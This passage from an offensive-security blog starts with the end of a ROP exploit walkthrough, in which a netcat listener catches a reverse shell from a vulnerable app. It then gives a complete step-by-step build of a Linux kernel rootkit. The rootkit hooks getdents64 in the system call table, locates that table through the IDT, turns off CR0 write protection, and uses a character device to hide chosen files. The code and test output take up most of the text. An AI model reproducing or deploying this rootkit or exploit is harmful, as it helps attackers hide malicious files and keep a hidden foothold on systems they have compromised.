s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()

Firstly we need to start netcat listening on port 8000 to catch the reverse shell:

1	`testuser@dev:~$ nc -l -p 8000`

Now we should launch the vulnerable application (notice I'm using a different user to make it more obvious when the exploit works):

1	`appuser@dev:~$ ./app-net`

Lastly we need to launch the exploit and watch the terminal that we are running netcat in:

1	`testuser@dev:~$ python app-net-rop-exploit.py`

Now looking at the terminal with netcat running and test by running some commands:

appuser@dev:/home/appuser$ pwd
pwd
/home/appuser
appuser@dev:/home/appuser$ whoami
whoami
appuser
appuser@dev:/home/appuser$ ls app-net
ls app-net
app-net

PWNED!!! :-D

Conclusion

It's important to realise that this exploit will not work against any other application, and might not even work with the same application run in a different environment (ie. on a different kernel version) or compiled with a different compiler or compiler version.

This is why it's so important to get as much information about the target environment as possible before developing an exploit for it.

That said, if you have understood this post you should now be able to develop a ROP exploit for any application on a 32 bit Linux system and beat both ASLR and NX, you just have to use the methodology we used here.

A bit of creativity needs to be used to create 1 of these exploits.

Happy Hacking :–)

Rootkit for Hiding Files

eXploit

By: 0xe7

23 October 2014 at 14:19

In this post I am going to be putting together all of the knowledge we have gained in the previous posts and improving on the last rootkit in a few different ways.

I will fix the issue that I explained the last LKM had (being able to query the file directly using ls [filename]), while making it more portable and giving it the ability to hide multiple files but I will start with splitting the LKM into multiple files to make it easier to manage.

The code for this rootkit will be in a link at the bottom of the post in .tgz format.

Splitting The LKM

Having the LKM split across multiple files makes it easier to manage, especially as the module gets more and more complex.

First we will start with the main file:

#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{

    sys_call_table = (void*)0xc1454100;
    original_getdents64 = sys_call_table[__NR_getdents64];

    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    set_page_ro(sys_call_table);
    return 0;
}

static void __exit hidefiles_exit(void)
{
    set_page_rw(sys_call_table);
    sys_call_table[__NR_getdents64] = original_getdents64;
    set_page_ro(sys_call_table);
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

I've made a couple of changes here, like I've set the sys_call_table page to read only after I've made the change and changing the name of the init and exit functions, but other than that it is copy and pasted from the last LKM.

Now for the file containing the system calls:

#define FILE_NAME "thisisatestfile.txt"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (strncmp(cur->d_name, FILE_NAME, strlen(FILE_NAME)) == 0) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

We also need to create a header file for the syscalls so that the functions can be referenced from the main.c file:

#ifndef SYSCALLS
#define SYSCALLS

#include <linux/semaphore.h>
#include <linux/types.h>
#include <linux/dirent.h>

// Functions
asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
extern asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

#endif

This needs to be included in both the main.c and syscalls.c files, just add the line #include "syscalls.h" somewhere near the top.

This is why we have to put #ifndef, this ensures that the file will not be included twice.

Now we need to create the C file for the last set of functions:

#include <asm/cacheflush.h>

int set_page_rw(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
    return 0;
}

int set_page_ro(unsigned long addr)
{
    unsigned int level;
    pte_t *pte = lookup_address(addr, &level);
    pte->pte = pte->pte &~_PAGE_RW;
    return 0;
}

We also need to create a header file for these functions so we can use them inside main.c:

#ifndef FUNCTS
#define FUNCTS

int set_page_rw(unsigned long addr);
int set_page_ro(unsigned long addr);

#endif

This file also needs to be included in main.c with the line #include "functs.h".

We now need a makefile:

1
2
3

obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o

I couldn't get it to work by just running make so I had to run the full command myself:

root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:21:9: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:23:2: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c: In function ‘hidefiles_exit’:
/root/lkms/hidefiles/main.c:29:2: warning: passing argument 1 of ‘set_page_rw’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:4:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
/root/lkms/hidefiles/main.c:31:9: warning: passing argument 1 of ‘set_page_ro’ makes integer from pointer without a cast [enabled by default]
In file included from /root/lkms/hidefiles/main.c:7:0:
/root/lkms/hidefiles/functs.h:5:5: note: expected ‘long unsigned int’ but argument is of type ‘void **’
  CC [M]  /root/lkms/hidefiles/functs.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'

We can ignore these warnings for the moment, we are going to replace these functions anyway.

Now to test our rootkit:

root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
root@dev:~/lkms/hidefiles# touch thisisatestfile.txt
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls -l
total 460
-rw-r--r-- 1 root root    344 Oct 31 14:11 functs.c
-rw-r--r-- 1 root root    113 Oct 31 14:11 functs.h
-rw-r--r-- 1 root root  62328 Oct 31 14:11 functs.o
-rw-r--r-- 1 root root 152670 Oct 31 14:11 hidefiles.ko
-rw-r--r-- 1 root root    810 Oct 31 14:11 hidefiles.mod.c
-rw-r--r-- 1 root root  42660 Oct 31 14:11 hidefiles.mod.o
-rw-r--r-- 1 root root 111024 Oct 31 14:11 hidefiles.o
-rw-r--r-- 1 root root    825 Oct 31 14:04 main.c
-rw-r--r-- 1 root root  33312 Oct 31 14:11 main.o
-rw-r--r-- 1 root root     64 Oct 31 14:01 Makefile
-rw-r--r-- 1 root root     41 Oct 31 14:11 modules.order
-rw-r--r-- 1 root root      0 Oct 31 14:11 Module.symvers
-rw-r--r-- 1 root root    968 Oct 31 14:00 syscalls.c
-rw-r--r-- 1 root root    352 Oct 31 14:07 syscalls.h
-rw-r--r-- 1 root root  18048 Oct 31 14:07 syscalls.o
-rw-r--r-- 1 root root      0 Oct 31 14:18 thisisatestfile.txt

So it seems to work nicely, now we can concentrate on extending it.

Automagically Finding sys_call_table

A brilliant writeup of how to find the sys_call_table, amungst other things, on x86 Linux is here. I highly recommend reading that post.

We are going to use the technique under section 3.1, titled How to get sys_call_table[] without LKM.

You can use a slight vairation of this technique on each architecture, just search Google a bit and you should be able to find something if you can't work it out from this description.

Firstly we need to read the Interrupt Descriptor Table Register (IDTR) and get the address of the base of the Interrupt Descriptor Table (IDT).

Offset 0x80 from the IDT base address is the address of a function called system_call, this function uses call to make system calls using the sys_call_table.

Once we have the base address of the system_call function we need to search through its code for 3 bytes ("\xff\x14\x85").

The memmem function just searches through code for a particular set of bytes and returns a pointer to it if found or NULL if not. Its implemented in libc but we will have to implement it ourselves in our LKM.

We also need to remember to include the 2 structs idtr and idt.

Here's the code for all of this which we can put into functs.c:

struct {
    unsigned short limit;
    unsigned long base;
} __attribute__ ((packed))idtr;

struct {
    unsigned short off1;
    unsigned short sel;
    unsigned char none, flags;
    unsigned short off2;
} __attribute__ ((packed))idt;

void *memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen)
{
    char *p;

    for(p = (char *)haystack; p <= ((char *)haystack - needlelen + haystacklen); p++)
        if(memcmp(p, needle, needlelen) == 0)
            return (void *)p;
    return NULL;
}

unsigned long *find_sys_call_table(void)
{
    char **p;
    unsigned long sct_off = 0;
    unsigned char code[255];

    asm("sidt %0":"=m" (idtr));
    memcpy(&idt, (void *)(idtr.base + 8 * 0x80), sizeof(idt));
    sct_off = (idt.off2 << 16) | idt.off1;
    memcpy(code, (void *)sct_off, sizeof(code));

    p = (char **)memmem(code, sizeof(code), "\xff\x14\x85", 3);

    if(p)
        return *(unsigned long **)((char *)p + 3);
    else
        return NULL;
}

We also need to add the following prototype to functs.h:

1	`unsigned long *find_sys_call_table(void);`

Lastly we need to edit main.c so that we get the address of sys_call_table using this method, we just replace the line that starts sys_call_table = with:

1
2
3

    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;

Improving The Method Of Writing To Read-Only Memory

So far we have manually changed the page table entry to change the permissions on the specific page that we want to write to read-write.

As we are running with the same privileges as the kernel we can do this in an easier way and ensure that any changes to this mechanism in the future doesn't stop our ability to write to this memory.

Running in kernel mode we have the ability to change the CR0 register.

The 16th bit of the CR0 register is responsible for enforcing whether or not the CPU can write to memory marked read-only.

With this is mind we can rewrite the functions that we were using in functs.c for this:

void disable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (value & 0x00010000) {
        value &= ~0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

void enable_write_protection(void)
{
    unsigned long value;
    asm volatile("mov %%cr0,%0" : "=r" (value));
    if (!(value & 0x00010000)) {
        value |= 0x00010000;
        asm volatile("mov %0,%%cr0": : "r" (value));
    }
}

I've changed the names to make it apparent that these functions are actually doing something different.

You also need to change the 2 prototypes in functs.h to:

1 2	`void disable_write_protection(void);` void enable_write_protection(void);

Lastly we need to edit main.c, remember these new functions do not require an argument.

Multi-File Support

To support hiding multiple files we need to implement a character device to communicate with the rootkit (we could use a network connection but we'll take that up later) and we need a method of storing the data.

For storing the data we will use a linked list, the kernel has the ability to manipulate linked lists but I will create my own functions for doing this as a programming exercise (later we will investigate how to use the features already in the kernel).

Linked List

First let's create the linked list and the functions for adding and removing items:

struct file_list {
    char *file_name;
    struct file_list *next_file;
};

typedef struct file_list list;

list *hidden_files = NULL;

void addfile(const char *f)
{
    list *tmp;
    char *s;
    if (hidden_files == NULL) {
        tmp = (list*)vmalloc(sizeof(list));
        s = vmalloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && (strlen(tmp->file_name) != strlen(f) || strncmp(tmp->file_name, f, strlen(tmp->file_name)) != 0)) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)vmalloc(sizeof(list));
            s = vmalloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(const char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(tmp->file_name, f, strlen(tmp->file_name)) == 0) {
                if (c == 0) {
                    hidden_files = tmp->next_file;
                    vfree(tmp->file_name);
                    vfree(tmp);
                    return;
                }
                tmp2->next_file = tmp->next_file;
                vfree(tmp->file_name);
                vfree(tmp);
            }
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

The structure of each element is defined at the top (lines 1 - 4), its pretty simple, just a basic singly linked list.

2 functions are then defined addfile and remfile, which are pretty self-explainitory, 1 thing to note here is that the vmalloc function is being used to allocate the memory, which allocates a contiguous address range of virtual memory, this obviously means that vfree has to be used to free the memory after.

Both of these functions take 1 argument, a string, and add or remove that string to the list depending on which function is called.

Its best to create a function that empties the list:

void emptylist()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        hidden_files = tmp->next_file;
        vfree(tmp->file_name);
        vfree(tmp);
        tmp = hidden_files;
    }
}

Lastly we need a function to check if a name exists in the list:

int lookupfilename(const char *f)
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strlen(tmp->file_name) == strlen(f)){
            if (strncmp(f, tmp->file_name, strlen(tmp->file_name)) == 0){
                return 1;
            }
        }
        tmp = tmp->next_file;
    }
    return 0;
}

This functions takes a string as an argument and iterates through the list checking, first the length, and then the whole string, against every entry in the list, if it finds a match it returns a 1, otherwise it returns a 0.

Initially I developed this linked list in a normal C application and just improved upon it and kernelfied it. :-) Here is my original application:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct file_list {
    char *file_name;
    struct file_list *next_file;
};
typedef struct file_list list;
list *hidden_files = NULL;

void addfile(const char *f);
void remfile(char *f);
void printfiles();

void main()
{
    addfile("one");
    remfile("one");
    printfiles();
    addfile("two");
    printfiles();
    addfile("three");
    addfile("four");
    printfiles();
    remfile("two");

    printfiles();
}

void addfile(const char *f)
{
    list *tmp;
    if (hidden_files == NULL) {
        tmp = (list*)malloc(sizeof(list));
        char *s = malloc(sizeof(*f));
        strcpy(s, f);
        tmp->file_name = s;
        tmp->next_file = hidden_files;
        hidden_files = tmp;
    } else {
        tmp = hidden_files;
        while (tmp != NULL && strcmp(tmp->file_name, f) != 0) {
            tmp = tmp->next_file;
        }
        if (tmp == NULL) {
            list *tmp2;
            tmp2 = (list*)malloc(sizeof(list));
            char *s = malloc(sizeof(*f));
            strcpy(s, f);
            tmp2->file_name = s;
            tmp2->next_file = hidden_files;
            hidden_files = tmp2;
        }
    }
}

void remfile(char *f)
{
    list *tmp, *tmp2;
    int c = 0;
    tmp = hidden_files;
    while (tmp != NULL) {
        if (strcmp(tmp->file_name, f) == 0) {
            if (c == 0) {
                hidden_files = tmp->next_file;
                free(tmp->file_name);
                free(tmp);
                return;
            }
            tmp2->next_file = tmp->next_file;
            free(tmp->file_name);
            free(tmp);
        }
        tmp2 = tmp;
        tmp = tmp->next_file;
        c += 1;
    }
}

void printfiles()
{
    list *tmp;
    tmp = hidden_files;
    while (tmp != NULL) {
        printf("%s : %x\n", tmp->file_name, tmp->next_file);
        tmp = tmp->next_file;
    }
}

Clearly this application is using more primitive versions of the addfile and remfile functions above. Its also using the usermode's malloc and free instead of vmalloc and vfree for obvious reasons.

I only included this to show how I've developed these functions in usermode and then converted it to kernelmode.

Anyway, the kernel functions above (addfile, remfile, emptylist and lookupfilename) as well as the struct declarations and definition should go into the file list.c.

#include "list.h" should be put at the top and the file list.h should be created with the following:

#ifndef LIST
#define LIST

#include <linux/vmalloc.h>

// Functions
void addfile(const char *f);
void remfile(const char *f);
void emptylist(void);
int lookupfilename(const char *f);

#endif

We need to include the linux/vmalloc.h header file for the vmalloc and vfree functions.

syscalls.c needs to be changed, list.h needs to be included, the FILE_NAME definition should be removed and the strncmp line should be changed to use lookupfilename instead, so it should end up like the following:

#include "syscalls.h"
#include "list.h"

asmlinkage int (*original_getdents64) (unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

asmlinkage int sys_getdents64_hook(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count)
{
    int rtn;
    struct linux_dirent64 *cur = dirp;
    int i = 0;
    rtn = original_getdents64(fd, dirp, count);
    while (i < rtn) {
        if (lookupfilename(cur->d_name) == 1) {
            int reclen = cur->d_reclen;
            char *next_rec = (char *)cur + reclen;
            int len = (int)dirp + rtn - (int)next_rec;
            memmove(cur, next_rec, len);
            rtn -= reclen;
            continue;
        }
        i += cur->d_reclen;
        cur = (struct linux_dirent64*) ((char*)dirp + i);
    }
    return rtn;
}

Because we want to hide some files when the LKM is loaded and also empty the list when the LKM is unloaded we need to include the list.h header file and make the relevent calls to addfile and emptylist in main.c, so our main.c should end up like this:

#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to edit the Makefile to include list.o, so it should end up like this:

1
2
3

obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o

Now to compile and test:

root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/main.o
/root/lkms/hidefiles/main.c: In function ‘hidefiles_init’:
/root/lkms/hidefiles/main.c:18:17: warning: assignment from incompatible pointer type [enabled by default]
  CC [M]  /root/lkms/hidefiles/syscalls.o
  CC [M]  /root/lkms/hidefiles/list.o
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/lkms/hidefiles/hidefiles.mod.o
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# rmmod hidefiles
root@dev:~/lkms/hidefiles# ls
functs.c  functs.o      hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h  thisisatestfile.txt
functs.h  hidefiles.ko  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o

So, as you can clearly see, our LKM automatically hides files on initialization and now should have the capability to hide multiple files.

Character Device

We now need the ability to communicate with the LKM to dynamically hide and unhide files. The only way we've learned how to do this so far is by using a character device.

This character device will be simpler than our previous one because we only need the write operation but you can implement read for feedback if you want.

We will put this in a new file:

#include "cdev.h"

#define DEV_MAX 512

static struct file_operations dev_fops = {
    .write = dev_write,
};

struct miscdevice dev_misc_device = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "hidefiles",
    .fops = &dev_fops
};

ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp )
{
    char temp_dev_file[DEV_MAX+1], new_dev_file[DEV_MAX];
    int i, n;
    memset(new_dev_file, 0, DEV_MAX);
    memset(temp_dev_file, 0, DEV_MAX+1);
    if(count > DEV_MAX){
        if(copy_from_user(temp_dev_file,buff,DEV_MAX) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            temp_dev_file[DEV_MAX] = '\0';
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return DEV_MAX;
    } else {
        if(copy_from_user(temp_dev_file,buff,count) != 0)
            printk("Userspace -> kernel copy failed!\n");
        else {
            for (i = 2, n = 0; i < strlen(temp_dev_file); i++, n++) {
                new_dev_file[n] = temp_dev_file[i];
            }
            if (strncmp(temp_dev_file, "a", 1) == 0 || strncmp(temp_dev_file, "A", 1) == 0) {
                addfile(new_dev_file);
            } else if (strncmp(temp_dev_file, "r", 1) == 0 || strncmp(temp_dev_file, "R", 1) == 0) {
                remfile(new_dev_file);
            }
        }
        return count;
    }
}

Here I'm setting the maximum size to 512 but you can set it to what you wish.

I also return the number of bytes written here so that it doesn't break some applications that try to write to it (python for example).

The first character of the input is being used as the operation (A or a for adding a file and R or r for removing a file) and the actual filename starts after the second character in the input.

I've also fixed the buffer overflow that was in the last character device.

We need to create the following header file:

#ifndef CDEV
#define CDEV

#include <linux/fs.h>
#include <asm/uaccess.h>
#include <linux/miscdevice.h>

#include "list.h"

// Functions
ssize_t dev_write(struct file *filep,const char *buff,size_t count,loff_t *offp );


// Structs
extern struct miscdevice dev_misc_device;

#endif

Now we need to include cdev.h in main.c, by adding the line #include "cdev.h" at the top, initialize the device on load and remove the device on unload, so our main.c should end up like this:

#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>
#include <linux/miscdevice.h>

#include "syscalls.h"
#include "functs.h"
#include "list.h"
#include "cdev.h"

MODULE_AUTHOR("0xe7, 0x1e");
MODULE_DESCRIPTION("Hide files on the system");
MODULE_LICENSE("GPL");

void **sys_call_table;

static int __init hidefiles_init(void)
{
    sys_call_table = find_sys_call_table();
    if(sys_call_table == NULL)
        return 1;
    original_getdents64 = sys_call_table[__NR_getdents64];

    disable_write_protection();
    sys_call_table[__NR_getdents64] = sys_getdents64_hook;
    enable_write_protection();
    misc_register(&dev_misc_device);
    addfile("thisisatestfile.txt");
    return 0;
}

static void __exit hidefiles_exit(void)
{
    disable_write_protection();
    sys_call_table[__NR_getdents64] = original_getdents64;
    enable_write_protection();
    misc_deregister(&dev_misc_device);
    emptylist();
    return;
}

module_init(hidefiles_init);
module_exit(hidefiles_exit);

Lastly we need to add cdev.o to the makefile:

1
2
3

obj-m += hidefiles.o

hidefiles-y := main.o syscalls.o functs.o list.o cdev.o

Now we just need to test it:

root@dev:~/lkms/hidefiles# make -C /lib/modules/$(uname -r)/build M=$PWD modules
make: Entering directory `/usr/src/linux-headers-3.14-kali1-686-pae'
  CC [M]  /root/lkms/hidefiles/cdev.o
/root/lkms/hidefiles/cdev.c: In function ‘dev_write’:
/root/lkms/hidefiles/cdev.c:50:1: warning: the frame size of 1028 bytes is larger than 1024 bytes [-Wframe-larger-than=]
  LD [M]  /root/lkms/hidefiles/hidefiles.o
  Building modules, stage 2.
  MODPOST 1 modules
  LD [M]  /root/lkms/hidefiles/hidefiles.ko
make: Leaving directory `/usr/src/linux-headers-3.14-kali1-686-pae'
root@dev:~/lkms/hidefiles# ls
app     cdev.h    functs.h      hidefiles.mod.c  list.c  main.c    modules.order   syscalls.h
app.c   cdev.o    functs.o      hidefiles.mod.o  list.h  main.o    Module.symvers  syscalls.o
cdev.c  functs.c  hidefiles.ko  hidefiles.o      list.o  Makefile  syscalls.c      thisisatestfile.txt
root@dev:~/lkms/hidefiles# insmod ./hidefiles.ko
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.ko     hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.ko")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app")'
root@dev:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:app.c")'
root@dev:~/lkms/hidefiles# ls
cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app.c")'
root@dev:~/lkms/hidefiles# ls
app.c   cdev.h  functs.c  functs.o         hidefiles.mod.o  list.c  list.o  main.o    modules.order   syscalls.c  syscalls.o
cdev.c  cdev.o  functs.h  hidefiles.mod.c  hidefiles.o      list.h  main.c  Makefile  Module.symvers  syscalls.h
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("r:app")'
root@dev:~/lkms/hidefiles# ls
app    cdev.c  cdev.o    functs.h  hidefiles.mod.c  hidefiles.o  list.h  main.c  Makefile       Module.symvers  syscalls.h
app.c  cdev.h  functs.c  functs.o  hidefiles.mod.o  list.c       list.o  main.o  modules.order  syscalls.c      syscalls.o
root@dev:~/lkms/hidefiles# python -c 'open("/dev/hidefiles", "w").write("a:hidefiles.mod.c")'
root@dev:~/lkms/hidefiles# ls
